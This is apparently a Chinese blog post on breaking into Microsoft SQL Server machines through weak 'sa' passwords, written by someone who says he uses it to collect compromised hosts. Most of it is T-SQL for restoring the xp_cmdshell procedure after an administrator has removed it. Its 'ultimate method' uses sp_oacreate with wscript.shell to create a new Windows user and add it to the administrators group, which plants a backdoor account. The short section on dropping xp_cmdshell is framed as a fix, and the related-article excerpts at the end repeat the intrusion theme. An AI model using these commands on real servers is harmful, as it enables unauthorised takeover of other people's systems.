sa弱口令強行入侵

2021-04-12 20:40:43 字數 2123 閱讀 2069

我自己現在找肉雞主要是找sa弱口令肉雞到還能找到幾隻,但也碰到不少困難,到處查資料總算找到點有用的。

下面這些命令要sql分離器才能實現,下面是一些關於sa弱口令相關命令。

一.更改sa口令方法:

二.簡單修補sa弱口令:

方法1:查詢分離器連線後執行:

if exists (select * from

dbo.sysobjects where id = object_id(n'[dbo].[xp_cmdshell]') and

objectproperty(id, n'i***tendedproc') = 1)

exec sp_dropextendedproc n'[dbo].[xp_cmdshell]'

go然後按f5鍵命令執行完畢。

方法2:查詢分離器連線後

第一步執行:use master,

第二步執行:sp_dropextendedproc 'xp_cmdshell',

然後按f5鍵命令執行完畢。

三.常見情況恢復執行xp_cmdshell:

1 未能找到儲存過程'master..xpcmdshell'。

恢復方法:查詢分離器連線後,

第一步執行:exec sp_addextendedproc xp_cmdshell,@dllname ='xplog70.dll'declare @o int,

第二步執行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll',

然後按f5鍵命令執行完畢。

2 無法裝載 dll xpsql70.dll 或該dll所引用的某一dll。原因126(找不到指定模組。)

恢復方法:查詢分離器連線後,

第一步執行:sp_dropextendedproc "xp_cmdshell",

第二步執行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'

然後按f5鍵命令執行完畢。

3 無法在庫 xpweb70.dll 中找到函式 xp_cmdshell。原因: 127(找不到指定的程式。)

恢復方法:查詢分離器連線後,

第一步執行:exec sp_dropextendedproc 'xp_cmdshell'

第二步執行:exec sp_addextendedproc 'xp_cmdshell','xpweb70.dll'

然後按f5鍵命令執行完畢。

四.終極方法:

如果以上方法均不可恢復,請嘗試用下面的辦法直接新增帳戶:

查詢分離器連線後,

2000servser系統:

declare @shell int exec sp_oacreate 'wscript.shell',@shell output

exec sp_oamethod @shell,'run',null,'c:/winnt/system32/cmd.exe /c net user 新使用者 密碼 /add'

declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod

@shell,'run',null,'c:/winnt/system32/cmd.exe /c net localgroup administrators 新使用者 /add'

xp或2003server系統:

declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod

@shell,'run',null,'c:/windows/system32/cmd.exe /c net user 新使用者 密碼 /add'

declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod

@shell,'run',null,'c:/windows/system32/cmd.exe /c net localgroup administrators 新使用者 /add'

其實還有其它辦法只要你掃到sa弱口令發現執行不了dos命令基本上是他的乙個擴充套件儲存給刪了,只要給他上傳乙個到system32下基本上可以解決。只是這個我還沒認真研究。 

利用SA弱口令入侵windows伺服器

mssql中儲存過程分為三種,系統提供的儲存過程,使用者自定義的儲存過程和擴充套件儲存過程。系統提供的儲存過程是在安裝sqlserver時建立的儲存過程,名字以 sp 開頭。使用者定義的儲存過程是用sqlserver的使用者編寫的儲存過程。擴充套件儲存過程則是對動態鏈結庫 dll 函式的呼叫,主要是...

sql弱口令入侵

sql弱口令入侵 mssql伺服器sa使用者弱口令入侵是及其經典的一種黑客入侵手法 其成名是在中美黑客大戰的時候,我們的前輩利用它入侵了很多美國鬼 子的伺服器。下面我介紹一下這種入侵的詳細情況。基礎知識 我們在安裝mssql伺服器之後,系統會有個預設的帳號sa 而這個帳號預設又是空密碼。最要命的是這...

入侵感知系列之弱口令檢測思路

弱口令檢測 背景 在安全方面弱口令問題算是技術含量最低的安全隱患了。但往往技術含量越低,被利用頻率也越高,而且造成的影響還不見得小。所以治理弱口令將成為安全體系建設中價效比最高的乙個環節。但是就是這樣乙個價效比高的環節想完全杜絕卻不是那麼容易,未來的系統可以通過註冊申請環節強制設定強密碼,但是針對過...